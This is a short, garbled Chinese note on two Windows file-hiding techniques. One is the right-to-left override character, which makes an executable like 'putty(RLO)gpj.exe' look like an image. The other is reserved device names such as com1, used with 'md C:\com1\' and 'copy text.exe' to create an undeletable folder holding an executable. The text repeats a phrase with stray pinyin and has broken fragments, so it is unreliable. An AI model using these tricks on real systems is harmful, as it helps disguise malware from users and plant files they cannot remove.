OVERRIDE

(U+202E)b例：putty(RLO字符)gpj.exe反向檔名制作反向檔名防護(hù)反向檔名防護(hù)反向檔名防護(hù)com1保留字

Windows保留給設(shè)備用的保留字符串con,

nul,

prn,

lpt1,lpt2,aux,com1,

com2,com3,

com4...b

目錄-

md

C:\com1

失敗-

md

C:\com1\

成功-copy

text.exe

C:\com1\-目錄無(wú)法刪除

，